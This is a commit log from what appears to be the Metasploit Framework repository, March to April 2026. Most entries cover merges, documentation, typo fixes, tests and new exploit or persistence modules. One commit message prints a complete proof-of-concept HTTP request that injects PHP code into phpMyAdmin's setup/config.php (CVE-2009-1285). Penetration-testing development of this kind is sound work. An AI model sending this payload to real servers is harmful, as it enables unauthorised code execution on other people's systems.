jenkins-metasploit 2038b133de automatic module_metadata_base.json update 2026-04-02 16:58:50 +00:00
jheysel-r7 0f156364eb Merge pull request #21158 from sfewer-r7/CVE-2026-20127
Add auxiliary module for Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability (CVE-2026-20127)
2026-04-02 09:50:22 -07:00
jenkins-metasploit aee4762d46 automatic module_metadata_base.json update 2026-04-02 13:22:16 +00:00
Spencer McIntyre d11e41ddfb Merge pull request #21143 from SaiSakthidar/php-meterpreter-tcp-server-tests
Php meterpreter tcp server tests
2026-04-02 09:12:37 -04:00
jenkins-metasploit 8858537ade Bump version of framework to 6.4.126 2026-04-02 10:55:06 +00:00
jenkins-metasploit 3f83860a9b automatic module_metadata_base.json update 2026-04-02 10:24:13 +00:00
cgranleese-r7 f877a6e9bd Merge pull request #21199 from Hemang360/fix-wordpress-module-scanner
Fix LocalJumpError in wordpress module scanner
2026-04-02 11:14:55 +01:00
jenkins-metasploit a36144b278 automatic module_metadata_base.json update 2026-04-02 09:57:33 +00:00
cgranleese-r7 9a8457585e Additional check for html_content
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-02 10:52:57 +01:00
Diego Ledda 5e3789d16a Merge pull request #21048 from zeroSteiner/feat/mod/socks-proxy/fiber-update
Update the SOCKS proxy to use the new RelayManager
2026-04-02 05:48:06 -04:00
SaiSakthidar 75f94fd508 Revert temporary fork/branch references in acceptance workflow 2026-04-02 09:34:04 +05:30
jenkins-metasploit 0503bbd8b7 automatic module_metadata_base.json update 2026-04-01 21:05:46 +00:00
Spencer McIntyre 8786dab27a Merge pull request #21218 from adfoster-r7/fix-crash-with-frozen-string-literals
Fix crash with frozen string literals
2026-04-01 16:56:05 -04:00
adfoster-r7 63e54a9291 Fix crash with frozen string literals 2026-04-01 20:34:46 +01:00
SaiSakthidar 62eecaeace Bump metasploit-payloads to 2.0.244 2026-04-01 19:25:21 +00:00
jenkins-metasploit 6890d8d1de automatic module_metadata_base.json update 2026-04-01 19:18:05 +00:00
adfoster-r7 21fbe713ef Merge pull request #21214 from adfoster-r7/add-additional-validation-to-db-import
Add additional validation to db_import
2026-04-01 20:03:59 +01:00
Spencer McIntyre 1d41776cf8 Merge pull request #21032 from Nayeraneru/UserInitMprLogon
windows persistence userinit_mpr_logon
2026-04-01 14:59:36 -04:00
jenkins-metasploit 653c92254b automatic module_metadata_base.json update 2026-04-01 18:43:22 +00:00
Spencer McIntyre 3f757d9880 Merge pull request #21172 from bwatters-r7/feature/x86_windows_fetch
Add HTTP and HTTPS fetch payloads for Windows x86
2026-04-01 14:34:36 -04:00
Spencer McIntyre e88bc5d621 Update payload cached sizes 2026-04-01 12:45:31 -04:00
Spencer McIntyre cdb01c692f Add tests 2026-04-01 12:45:31 -04:00
Spencer McIntyre 8083693105 Join the client thread in #stop 2026-04-01 12:45:30 -04:00
Spencer McIntyre 096913343d Switch to the fiber relay manager 2026-04-01 12:45:30 -04:00
Spencer McIntyre 24b8b730e9 Update rex-core to 0.1.36 2026-04-01 12:45:30 -04:00
Spencer McIntyre 34c7a18ef4 Merge pull request #21217 from dineshg0pal/fix/small-typo-fixes
Fix: small typo's in Documentation
2026-04-01 12:38:25 -04:00
Dinesh b668069682 fix: corrected SHA12 to SHA512 2026-04-01 21:32:28 +05:30
Dinesh 7bdfdf9703 fix: removed extra "use" in cmd lines 2026-04-01 21:29:21 +05:30
Dinesh fe0c7e4e97 fix: removed "are" duplicate 2026-04-01 21:25:00 +05:30
Dinesh 2d4c3e748e fix: removed duplicate "which" 2026-04-01 21:22:38 +05:30
bwatters-r7 1f1ca87753 Update specs to reflect the new constraints for FETCH_COMMAND values 2026-04-01 10:35:12 -05:00
adfoster-r7 acefa87790 Add additional validation to db_import 2026-04-01 10:47:50 +01:00
adfoster-r7 79ea88e2f9 Merge pull request #21188 from adfoster-r7/fix-crash-on-older-ruby-versions
Fix crash on older Ruby versions
2026-04-01 10:46:23 +01:00
Nayeraneru 6a1c6437b9 msftidy 2026-03-31 23:49:08 +02:00
Nayera 15845faf63 Remove writable_dir method 2026-03-31 23:46:09 +02:00
Nayeraneru 609866dc94 add doc 2026-03-31 23:46:09 +02:00
Nayera 70c5496fe5 windows persistence userinit_mpr_logon 2026-03-31 23:46:09 +02:00
bwatters-r7 ca21ae4177 Clean up FETCH_COMMAND options 2026-03-31 15:41:36 -05:00
jenkins-metasploit 24622613d2 automatic module_metadata_base.json update 2026-03-31 19:58:26 +00:00
Spencer McIntyre 839fc52011 Merge pull request #21004 from EclipseAditya/fix/20899-registry-trailing-backslash
Fix trailing backslash in shell registry operations
2026-03-31 15:49:09 -04:00
jenkins-metasploit 54afd312a8 automatic module_metadata_base.json update 2026-03-31 16:18:43 +00:00
Christophe De La Fuente 09a59af789 Merge pull request #21069 from Chocapikk/add-module-freescout-htaccess-rce 2026-03-31 18:09:30 +02:00
Spencer McIntyre 8a6dd99db6 Merge pull request #21209 from dineshg0pal/fix/small-typo-fixes
Fix: minor typos in Pivoting-in-Metasploit.md
2026-03-31 11:06:51 -04:00
Dinesh 600a07d1dd Update docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-03-31 20:04:13 +05:30
Dinesh 6554aa6416 fix: typo mistake "UPD" changed to "UDP"
At the file "Pivoting-in-Metasploit.md" -----> typo mistake of "UPD" changed to correct "UDP"
2026-03-31 19:24:15 +05:30
Dinesh 7186a16647 fix: removing duplicate "final"
At the "metasploit-framework/docs/metasploit-framework/Pivoting-in-Metasploit.md" --------> At the topic "proxychain-ng setup" ---> duplicate "final" word is removed
2026-03-31 19:20:13 +05:30
g0t mi1k 38d8ea7937 phpmyadmin_config: Make rubocop happy 2026-03-31 14:49:03 +01:00
g0t mi1k 806c889225 php_include: Tweak check() 2026-03-31 14:46:11 +01:00
g0t mi1k 92c068d9f7 php_include: Consistencies
Sorry, not sorry
2026-03-31 14:46:00 +01:00
jenkins-metasploit 95f0ea92f0 automatic module_metadata_base.json update 2026-03-31 13:41:57 +00:00
cgranleese-r7 6f770d0288 Merge pull request #21208 from adfoster-r7/update-report-note-calls
Fix deprecation notices when reporting notes
2026-03-31 14:32:46 +01:00
jenkins-metasploit ad7a513407 automatic module_metadata_base.json update 2026-03-31 13:17:54 +00:00
msutovsky-r7 a79c21535d Land #20999, removes older persistence module
Remove obsolete windows/local/persistence in favor of windows/persistence/registry
2026-03-31 15:09:04 +02:00
jenkins-metasploit ba059417a3 automatic module_metadata_base.json update 2026-03-31 12:57:11 +00:00
msutovsky-r7 6d4b268f9f Land #21029, adds module for Grav CMS (CVE-2025-50286)
Adds exploit module for Grav CMS (CVE-2025-50286)
2026-03-31 14:47:44 +02:00
cgranleese-r7 e5e18383a2 Merge pull request #21187 from Devansh7006/patch-1
Improve HTTP PUT module documentation
2026-03-31 13:03:56 +01:00
jenkins-metasploit 6fe38a377c automatic module_metadata_base.json update 2026-03-31 11:44:17 +00:00
adfoster-r7 3846b087ad Update report note calls 2026-03-31 12:39:21 +01:00
adfoster-r7 80d01cd0c1 Merge pull request #21207 from zeroSteiner/fix/mod/enum-protections/report-hash
Fix a deprecation notice when reporting notes
2026-03-31 12:35:50 +01:00
jenkins-metasploit b41522b3f7 automatic module_metadata_base.json update 2026-03-31 11:08:55 +00:00
adfoster-r7 b24b23fcbf Merge pull request #21138 from g0tmi1k/rhosts
[Bug Fix] Auxiliary: Check if module is meant to have rhosts
2026-03-31 12:00:36 +01:00
cgranleese-r7 55152da83a Merge pull request #21186 from Devansh7006/add-wordpress-pingback-doc
Add documentation for wordpress_pingback_access module
2026-03-31 11:40:24 +01:00
adfoster-r7 c0a9794d7f Update tests and module that needed the rhost option set 2026-03-31 11:40:13 +01:00
Devansh7006 b9666f5f0e Improve formatting and clarity of WordPress pingback module
Reformatted the verification steps and options for clarity. Removed redundant lines and added example usage.
2026-03-31 12:40:19 +05:30
Devansh7006 d3a1bdaa88 Fix HTTP PUT module documentation formatting and structure
Updated example usage and added details for the PUT action.
2026-03-31 12:28:17 +05:30
g0t mi1k 24ee2a9ce5 Auxiliary: Check if module is meant to have rhosts 2026-03-31 07:08:03 +01:00
g0t mi1k e025f94f78 phpmyadmin_config: Add report_service() support 2026-03-31 07:07:49 +01:00
g0t mi1k 3a1d34e300 phpmyadmin_config: Ordering matters (check vs exploit) 2026-03-31 07:07:49 +01:00
g0t mi1k 18e4c8e28d phpmyadmin_config: Misc ruby format tweaks
This is based on MR feedback
2026-03-31 07:07:49 +01:00
g0t mi1k 8938ee75e5 phpmyadmin_config: Another <= v3.1.3.1 (CVE-2009-1285)
CVE-2009-1285 has two vulns for v3.1.x

## PoC

```
POST /setup/config.php?type=post HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Content-Type: application/x-www-form-urlencoded
Cookie: phpMyAdmin=3d88785a775a6bdd4a4eee4d7ce5fe7b99a802bb; pma_lang=en-utf-8; pma_charset=utf-8; pma_mcrypt_iv=Mc1O5ByaScc%3D; phpMyAdmin=aeb5279f061348c557a7c366abb67deefe14b535
Content-Length: 109

token=e555e9ff29b23a81ff9d20affa616a8b&eol=unix&textconfig=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E&submit_save=Save
```
2026-03-31 07:07:49 +01:00
g0t mi1k cc3f76d586 phpmyadmin_config: Reformat code 2026-03-31 07:07:49 +01:00
g0t mi1k bf28b0d3e7 phpmyadmin_config: Add v3.1.x
As it turns out, this is part of CVE-2009-1285 (<= v3.1.3.1)
This does not exploit CVE-2009-1151 for v3.1.x
2026-03-31 07:07:49 +01:00
g0t mi1k d6914f0812 phpmyadmin_config: Reformat exploit 2026-03-31 07:07:41 +01:00
g0t mi1k 6cc3e391f7 phpmyadmin_config: Add check 2026-03-31 07:05:54 +01:00
g0t mi1k 91ceaad082 php_include: Remove duplicate code 2026-03-31 06:55:59 +01:00
g0t mi1k 158bd4f6b2 php_include: Add POST support for check() 2026-03-31 06:49:17 +01:00
g0t mi1k 93d735b07c php_include: Sends headers using check() 2026-03-31 06:44:48 +01:00
g0t mi1k b5b92ce0fe php_include: POSTDATA -> FORMDATA 2026-03-31 06:40:51 +01:00
g0t mi1k 09c01a6979 php_include: PATH -> ROOTDIR 2026-03-31 06:39:23 +01:00
g0t mi1k b0f3dd9fe3 php_include: XXpathXX -> !INJECT! 2026-03-31 06:38:52 +01:00
Spencer McIntyre 1c93bb4848 Fix a deprecation notice when reporting notes 2026-03-30 17:51:41 -04:00
jenkins-metasploit 71d4faa26c automatic module_metadata_base.json update 2026-03-30 21:49:12 +00:00
Spencer McIntyre 402502b262 Merge pull request #21194 from bcoles/enum_protections
Improve post/linux/gather/enum_protections module
2026-03-30 17:40:26 -04:00
jenkins-metasploit 466a63843d automatic module_metadata_base.json update 2026-03-30 21:26:59 +00:00
Spencer McIntyre 217f98b74d Merge pull request #21181 from aryan9190/docs/appletv-display-image
Add YARD documentation for AppleTV display image module
2026-03-30 17:18:19 -04:00
bwatters-r7 a0594483b0 Specs for the spec gods 2026-03-30 15:57:06 -05:00
adfoster-r7 c9ea7506ed Merge pull request #21203 from dineshg0pal/fix/small-typo-fixes
Fix: minor syntax and formatting issues in documentation
2026-03-30 20:51:02 +01:00
cgranleese-r7 06520cb1ad Merge pull request #21201 from aryan9190/docs/rex-post-io
Add YARD documentation for Rex::Post::IO class
2026-03-30 16:23:27 +01:00
Dinesh 44d15b4d84 fix: added "/" to the <html> to prevent syntax logic
added the "/" to the <html> at the  title ---> "Parsing HTML with Nokogisi ------> to prevent html syntax logic
2026-03-30 19:35:36 +05:30
Dinesh 2c2e07e81f fix: removed duplicate "is"
from the "Metasploit-URL-support-proposal.md ------> removed the duplicate "is" from the sub-topic "Multiple Options"
2026-03-30 19:32:11 +05:30
jenkins-metasploit 35831dfd30 automatic module_metadata_base.json update 2026-03-30 13:59:04 +00:00
Dinesh a21527411f fix: invalid JSON syntax
At the "Writing-External-Metasploit-framework.wiki/Writing-External-Metasploit-Modules.md ----> added "," to prevent misunderstanding of JSON format
2026-03-30 19:27:02 +05:30
adfoster-r7 438b8e0875 Merge pull request #21102 from zeroSteiner/fix/re-add-20989
Reapply "This adjusts module options that need a routable address"
2026-03-30 14:50:05 +01:00
cgranleese-r7 7e4bad55cc Merge pull request #21202 from adfoster-r7/update-bofloader-logo-location
Update bofloader logo location
2026-03-30 13:17:48 +01:00
Aryan Yadav 57aacaa2b2 Add YARD documentation for Rex::Post::IO class 2026-03-30 16:33:01 +05:30
adfoster-r7 1271eed27d Update bofloader logo location 2026-03-30 11:33:49 +01:00
adfoster-r7 113598b90e Merge pull request #21200 from dineshg0pal/fix/go-syntax-module
fix: correct syntax errors in Go module template
2026-03-30 11:09:53 +01:00
Dinesh be2b60e873 fix: correct syntax errors in Go module template
updated the "metasploit-framework/docs/metasploit-framework.wiki/Writing-External-Golang-Modules.md, with the ">" syntax correction
2026-03-30 12:26:54 +05:30
Hemang360 0ed8a87167 Fix LocalJumpError in wp_perfect_survey_sqli 2026-03-30 01:08:00 +05:30
bcoles b17a5727b5 Improve post/linux/gather/enum_protections module
* Add system hardening checks
* Add detection for modern security tools
* Add module documentaiton
2026-03-29 15:07:56 +11:00
adfoster-r7 15f84bc216 Merge pull request #21073 from Hemang360/fix-duplicate-job
Fix duplicate handler jobs caused by stop_handler on repeated run
2026-03-28 13:22:39 +00:00
arkaprabhachakraborty 1ecc346d65 Remove target_uri method and replace with datastore['TARGETURI'] to address override issues
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-03-28 01:55:44 +05:30
Valentin Lobstein 2a1ebdb996 Update modules/exploits/multi/http/freescout_htaccess_rce.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2026-03-27 19:30:47 +01:00
jenkins-metasploit 042cd310a0 automatic module_metadata_base.json update 2026-03-27 16:47:50 +00:00
adfoster-r7 20bb912515 Merge pull request #21023 from g0tmi1k/os_cmd_exec
Add: exploits/multi/http/os_cmd_exec
2026-03-27 16:38:03 +00:00
Nayeraneru e26330a4fb Fix CI specs 2026-03-27 15:06:16 +02:00
adfoster-r7 cc143fa463 Fix crash on older Ruby versions 2026-03-27 13:00:25 +00:00
cgranleese-r7 2162a9df0b Merge pull request #21145 from Nayeraneru/docs/msf-auxiliary-auth_brute
Enhance method documentation in auth_brute.rb
2026-03-27 11:52:21 +00:00
Devansh7006 bccbf35950 Enhance documentation for WordPress pingback module
Updated verification steps and added example run for clarity.
2026-03-27 17:07:24 +05:30
jenkins-metasploit 7770bd4475 automatic module_metadata_base.json update 2026-03-27 11:32:03 +00:00
cgranleese-r7 971cb93944 Merge pull request #21097 from g0tmi1k/ftp
auxiliary/scanner/ftp/anonymous: Add report_service()
2026-03-27 11:23:35 +00:00
Devansh7006 e56610b530 Enhance documentation for HTTP PUT scanner module
Added verification steps and detailed options for HTTP PUT scanner.
2026-03-27 16:45:55 +05:30
Devansh7006 63ad9b06bf Refactor WordPress Pingback Access documentation
Removed redundant sections and improved formatting for clarity.
2026-03-27 16:39:37 +05:30
cgranleese-r7 655e21af7b Merge pull request #21150 from Nayeraneru/docs/msf-core-payload-adapter-fetch.rb
Enhance documentation for fetch adapter methods
2026-03-27 11:07:02 +00:00
cgranleese-r7 ab4f24db5d Merge pull request #21149 from Adithyadspawar/add-auxiliary-scanner-docs
Add documentation for auxiliary scanner modules
2026-03-27 11:02:43 +00:00
cgranleese-r7 ba51260609 Adds missing # 2026-03-27 11:00:40 +00:00
cgranleese-r7 e089cf28a4 Merge pull request #21144 from Nayeraneru/docs/msf-auxiliary-web-http-yard
Enhance documentation for HTTP module methods
2026-03-27 10:53:43 +00:00
cgranleese-r7 8c98721044 Merge pull request #21185 from adfoster-r7/additional-agents-md-file-edits
Additional agents md file edits
2026-03-27 10:05:44 +00:00
Devansh7006 8e2e293062 Improve HTTP PUT module documentation
Updated the documentation for the HTTP PUT File Upload Scanner module to clarify usage and options.
2026-03-27 15:33:23 +05:30
Devansh7006 93fb3b464b Add WordPress Pingback Access Scanner documentation
This document outlines the WordPress Pingback Access Scanner module, its verification steps, options, and scenarios for use in security assessments.
2026-03-27 15:04:49 +05:30
x1o3 d12e3945fe plugin version parsing and check logic improvement, msftidy & rubocop compliant 2026-03-27 11:47:30 +05:30
x1o3 de81c5f0dc plugin version parsing and check logic improvement, msftidy & rubocop compliant 2026-03-27 11:45:20 +05:30
Chocapikk 140b58f429 Fix: address PR review feedback for freescout htaccess rce module 2026-03-27 00:34:22 +01:00
Valentin Lobstein 3f718d77b4 Update modules/exploits/multi/http/freescout_htaccess_rce.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2026-03-27 00:29:57 +01:00
adfoster-r7 316c2868a5 Additional agents md file edits 2026-03-26 21:31:24 +00:00
SaiSakthidar c6529e83cd Merge branch 'rapid7:master' into php-meterpreter-tcp-server-tests 2026-03-27 00:57:05 +05:30
arkaprabhachakraborty 26a73b060d Resolve rubocop errors and warnings. Address copilot comments on docs and code quality.
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-03-27 00:43:23 +05:30
Spencer McIntyre 700d063645 Implement copilot feedback 2026-03-26 14:43:33 -04:00
Spencer McIntyre 93e3616115 Add tests and normalization 2026-03-26 14:43:33 -04:00
Spencer McIntyre 56869f4e0b Mark 0.0.0.0 as an acceptable local address 2026-03-26 14:43:33 -04:00
Spencer McIntyre b743296f48 Reapply "This adjusts module options that need a routable address"
This reverts commit 628275ef59.
2026-03-26 14:43:31 -04:00
Hemang360 e76c21d0db Add tests for #stop_handler 2026-03-26 23:26:28 +05:30
Spencer McIntyre 308b7277a1 Apply suggestion from @adfoster-r7
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2026-03-26 13:21:42 -04:00
sfewer-r7 aa84007608 dont mix vprint_status and teh slient flag. improve some of the print message for better consistency 2026-03-26 15:08:29 +00:00
Aryan Yadav 3da962b6a4 Add YARD documentation for AppleTV display video module 2026-03-26 20:30:40 +05:30
sfewer-r7 86518493a3 dont rescue StandardError here, if it ever gets raised, let if bubble up 2026-03-26 14:56:22 +00:00
sfewer-r7 057ee46e03 use privkey_path as a better var name 2026-03-26 14:55:09 +00:00
Chocapikk 222e1a28ab Fix: Address Copilot review feedback on blind extraction and calibration
- Widen blind_dump_data bisection range from 0..127 to 0..255 for
  binary-safe byte extraction, use Encoding::BINARY for chr output
- Revert read_from_file to positional param (binary = false) to stay
  consistent with MSSQL/PostgreSQL implementations
- Add elapsed <= 0 guard and .clamp on calibrated benchmark iterations
- Add unit specs for blind_detect_length and blind_dump_data covering
  zero-length, ASCII, long strings, and high bytes (>127)
- Fix rubocop: remove leading blank line, use single-quoted strings
2026-03-26 15:53:51 +01:00
sfewer-r7 f857ea77c9 get rid of STORE_SSH_KEY_FILES as the private key will be in loot anyway 2026-03-26 14:53:25 +00:00
Aryan Yadav 2d69fb98f3 Add YARD documentation for AppleTV display image module 2026-03-26 20:17:21 +05:30
sfewer-r7 bdb99b20ae fix reference arrays 2026-03-26 14:40:59 +00:00
jenkins-metasploit eefd7c89ab automatic module_metadata_base.json update 2026-03-26 14:40:19 +00:00
cgranleese-r7 8107adf1a7 Merge pull request #21090 from g0tmi1k/report_service
Add report_service()
2026-03-26 14:31:36 +00:00
cgranleese-r7 6562cb6b2d Merge pull request #21175 from adfoster-r7/add-additional-markdown-notes
Add additional markdown notes
2026-03-26 13:33:42 +00:00
sfewer-r7 51b5f582ad these extensions are not required 2026-03-26 13:29:05 +00:00
jenkins-metasploit de67e4341a Bump version of framework to 6.4.125 2026-03-26 12:41:59 +00:00
sfewer-r7 c7708416e5 potential fix for loading openssl on win 2026-03-26 12:27:07 +00:00
sfewer-r7 75f3fcd788 rubocop nit, add newline 2026-03-26 12:10:08 +00:00
Stephen Fewer ce921c8e65 verify openssl lib exist in the current path before we try to open it
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-03-26 12:06:31 +00:00
Stephen Fewer 493bc214dc add several absolute paths to OpenSSL for mac
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-03-26 12:05:13 +00:00
Stephen Fewer 3b3b54a217 Update modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-03-26 12:00:16 +00:00
cgranleese-r7 266b87bfaa Merge pull request #21174 from adfoster-r7/fix-command-parsing-option-from-msfconsole-cli
Fix command parsing option from msfconsole cli
2026-03-26 11:49:13 +00:00
cgranleese-r7 cc64746df5 Merge pull request #21179 from adfoster-r7/fix-encoding-issues-in-files
Fix encoding issues in files
2026-03-26 11:45:02 +00:00
jenkins-metasploit 0c060b0265 automatic module_metadata_base.json update 2026-03-25 23:17:47 +00:00
adfoster-r7 b3f985dd72 Merge pull request #21178 from zeroSteiner/feat/mod/att&ck/1
Add MITRE ATT&CK tags for two modules
2026-03-25 23:06:49 +00:00
adfoster-r7 1faa27f7e6 Fix encoding issues in files 2026-03-25 19:01:57 +00:00
jenkins-metasploit fa3c5cffdb automatic module_metadata_base.json update 2026-03-25 13:48:24 +00:00
g0t mi1k 17161c42e2 Make Rubocop happy 2026-03-25 13:39:20 +00:00
msutovsky-r7 0976f88058 Land #20835, adds module unauthenticated command injection Eclipse Che machine-exec (CVE-2025-12548)
Add Eclipse Che machine-exec unauthenticated RCE (CVE-2025-12548)
2026-03-25 14:39:01 +01:00
g0t mi1k 89af3ad558 Sync datastore_headers
Note: This code was suggested by a LLM (Copilot) in the MR
2026-03-25 13:32:46 +00:00
adfoster-r7 df6c144598 Add extra requirements 2026-03-25 13:12:39 +00:00
Spencer McIntyre b32c4a1dd9 Add ATT&CK metadata to auxiliary/admin/ldap/ad_cs_cert_template 2026-03-24 17:43:51 -04:00
Spencer McIntyre 522f42c158 Add ATT&CK metadata to auxiliary/scanner/ntp/timeroast 2026-03-24 17:43:27 -04:00
jheysel-r7 50883dd733 Merge pull request #21176 from zeroSteiner/fix/ci/setup-php/1
Bump the setup-php version to 2.37.0
2026-03-24 14:16:32 -07:00
Spencer McIntyre 86f65c3732 Bump the setup-php version 2026-03-24 17:02:44 -04:00
adfoster-r7 77ecd1107f Merge pull request #21173 from msutovsky-r7/fix/lib/exe/vbs-fileformat
Fixes VBS payload format generating
2026-03-24 20:30:19 +00:00
adfoster-r7 e7eb5f760b Add additional markdown notes 2026-03-24 20:17:29 +00:00
g0t mi1k 51f36982c7 Add: exploits/multi/http/os_cmd_exec
A lot of this was based on: exploits/unix/webapp/php_eval
2026-03-24 20:01:30 +00:00
jenkins-metasploit f02786ad9f automatic module_metadata_base.json update 2026-03-24 19:49:47 +00:00
Brendan 7ea60dd7d1 Merge pull request #20478 from futileskills/escpos-injector-module
Create escpos_tcp_command_injector.rb
2026-03-24 14:40:27 -05:00
Christophe De La Fuente bf1a12301b Merge pull request #20967 from jheysel-r7/fix/lib/smb_relay_ruby_client_support
Add support for Ruby SMB Client and `smbclient` to be compatible with Msf::Exploit::Remote::SMB::RelayServer
2026-03-24 18:12:45 +01:00
Martin Sutovsky 8f08b1f23a Adds binary encoding to all files created in exe split 2026-03-24 17:47:40 +01:00
SaiSakthidar 979dea126a Update .github/workflows/shared_meterpreter_acceptance.yml
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2026-03-24 22:12:15 +05:30
Jack Heysel ab07a71648 Gemfile bump 2026-03-24 08:25:06 -07:00
Martin Sutovsky 7170c778a8 Prepends binary coding to all platform-specific files for payload generating 2026-03-24 16:13:05 +01:00
adfoster-r7 7b0275c42e Merge pull request #21171 from cgranleese-r7/add-option-to-overide-verbose-on-scanners
Adds options to report summary to overide verbose output
2026-03-24 14:15:21 +00:00
adfoster-r7 80c5c32048 Fix command parsing option frofrom msfconsole cli 2026-03-24 14:09:57 +00:00
Spencer McIntyre 3785eedcf2 Merge pull request #21169 from SaiSakthidar/fix/macos-mettle-macho-detection
Fix binary-safe Mach-O detection
2026-03-24 10:09:08 -04:00
adfoster-r7 f75541bd31 Merge pull request #21148 from adfoster-r7/add-global-datastore-option-configuration
Add global datastore option configuration
2026-03-24 09:31:20 +00:00
Martin Sutovsky 8042f96fde Fixes VBS payload format generating 2026-03-24 09:48:38 +01:00
Jack Heysel 45884fa090 Removed method parse override 2026-03-23 23:10:29 -07:00
bwatters-r7 be2590af6f Add HTTP and HTTPS fetch payloads for Windows x86 2026-03-23 19:19:00 -05:00
jenkins-metasploit 061d193fc2 automatic module_metadata_base.json update 2026-03-23 20:29:22 +00:00
jheysel-r7 81faae13ca Merge pull request #21033 from Alpenlol/barracuda-esg-cve-2023-2868
Add exploit for CVE-2023-2868 Barracuda ESG command injection
2026-03-23 13:18:34 -07:00
jenkins-metasploit f6bb859a7d automatic module_metadata_base.json update 2026-03-23 19:50:12 +00:00
Curt Hyvarinen f14b640de8 Fix rubocop spacing offenses in Author block 2026-03-23 12:40:48 -07:00
Spencer McIntyre b89fb5aa62 Merge pull request #21049 from h00die/fix_persistence_directory
better wriable_dir for windows persistence
2026-03-23 15:40:32 -04:00
jenkins-metasploit a8e93d091e automatic module_metadata_base.json update 2026-03-23 18:49:54 +00:00
adfoster-r7 a863473046 Merge pull request #20980 from msutovsky-r7/fix/bump-payloads/2.0.243
Updates metasploit-payloads to 2.0.242
2026-03-23 18:40:24 +00:00
Curt Hyvarinen 5d7a154b19 Credit cfielding-r7 as original PoC author 2026-03-23 10:45:41 -07:00
cgranleese-r7 b18d271018 Adds options to report summary to overide verbose output 2026-03-23 15:52:53 +00:00
Spencer McIntyre d2a6526ce5 Merge pull request #21167 from vatsalgargg/fix/typo-authentification-to-authentication
fix: correct typo 'Authentification' to 'Authentication' in postgres and mssql files
2026-03-23 10:43:37 -04:00
Spencer McIntyre dacc0a2939 Merge pull request #21166 from vatsalgargg/fix/typo-recieved-to-received
fix: correct typo 'recieved' to 'received' in two files
2026-03-23 10:40:55 -04:00
Martin Sutovsky 0c75717e21 Fixes cached_size for payloads 2026-03-23 15:22:00 +01:00
vatsalgargg 5af9d70df4 revert: keep original API class names in message.rb 2026-03-23 19:03:06 +05:30
Valentin Lobstein 20d795d91e Fix: Address PR review feedback
Module changes (cgranleese-r7):
- Remove VERBOSE from DefaultOptions
- Make COUNT required with default 0
- Simplify COUNT usage since it's now always present

Specs (bwatters-r7):
- Expand mysqli_common_spec.rb with tests for version, current_database,
  current_user, enum_database_names, enum_table_names, enum_table_columns,
  sleep_call, hex_encode_strings, hex/base64 encoders, time_blind_payload,
  and blind_detect_length binary search
- Expand mysqli_time_based_spec.rb with tests for IF/sleep payload
  generation, SqliDelay usage, test_vulnerable, and Common inheritance
- Add mysqli_benchmark_based_blind_spec.rb with tests for BENCHMARK
  multiplication payload, calibrated iterations, SHA1 seed randomization,
  test_vulnerable, and calibrate
2026-03-23 01:58:29 +01:00
SaiSakthidar 04e0ca642d Fix binary-safe Mach-O detection 2026-03-21 18:40:18 +00:00
h00die 7631b54c0f better wriable_dir for windows persistence 2026-03-21 12:21:09 -04:00
arkaprabhachakraborty ae71513ce1 Add feature to create tickets and grab ticket number when TICKET_NUMBER is not specified
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-03-21 19:02:39 +05:30
vatsalgargg 37f9ae4f0b fix: correct typo 'Authentification' to 'Authentication' 2026-03-21 13:29:36 +05:30
vatsalgargg d0551c397e fix: correct typo 'recieved' to 'received' in two files 2026-03-21 13:24:51 +05:30
g0t mi1k 8922255cc9 Add report_service() 2026-03-20 20:06:01 +00:00
sfewer-r7 f822f98438 add in aux module for CVE-2026-20127 2026-03-20 12:33:24 +00:00
Nayeraneru 242cf2894f Fix reused option visibility mutations 2026-03-20 09:44:56 +02:00
adfoster-r7 f9976dd8a2 Add global datastore option configuration 2026-03-20 00:10:33 +00:00
Jack Heysel 81b34421a9 Responded to comments 2026-03-19 14:15:49 -07:00
Nayera bad8ddc605 Enhance documentation for fetch adapter methods 2026-03-19 21:45:55 +02:00
Adithyadspawar 6326f14768 Add documentation for 5 auxiliary scanner modules 2026-03-19 22:59:00 +05:30
jenkins-metasploit e836223760 Bump version of framework to 6.4.124 2026-03-19 15:02:17 +00:00
Adithyadspawar 20c265dc32 Add documentation for 5 auxiliary scanner modules
Add module documentation for:
- auxiliary/scanner/http/apache_activemq_traversal
- auxiliary/scanner/http/drupal_views_user_enum
- auxiliary/scanner/http/coldfusion_version
- auxiliary/scanner/http/elasticsearch_traversal
- auxiliary/scanner/ftp/bison_ftp_traversal

Fixes #12389
2026-03-19 20:19:26 +05:30
Martin Sutovsky 1fafacd3e0 Fixes cached_sizes 2026-03-19 10:23:07 +01:00
msutovsky-r7 242fa9fdb9 Fixes bump to 242 2026-03-19 10:01:29 +01:00
Martin Sutovsky cf89a81499 Bumps metasploit-payloads to 2.0.43 2026-03-19 10:00:35 +01:00
Nayera aabb39416f Enhance method documentation in auth_brute.rb 2026-03-19 07:38:30 +02:00
Nayera 7aaaa6e12d Enhance documentation for HTTP module methods 2026-03-19 06:44:41 +02:00
jenkins-metasploit b263ba78fa automatic module_metadata_base.json update 2026-03-18 23:56:12 +00:00
Jack Heysel e9502ce7ed Fix for gss token identification 2026-03-18 16:56:07 -07:00
Brendan 5b5d1dbfaa Merge pull request #21076 from Chocapikk/avideo-encoder-getimage-cmd-injection
Add AVideo Encoder getImage.php command injection (CVE-2026-29058)
2026-03-18 18:46:32 -05:00
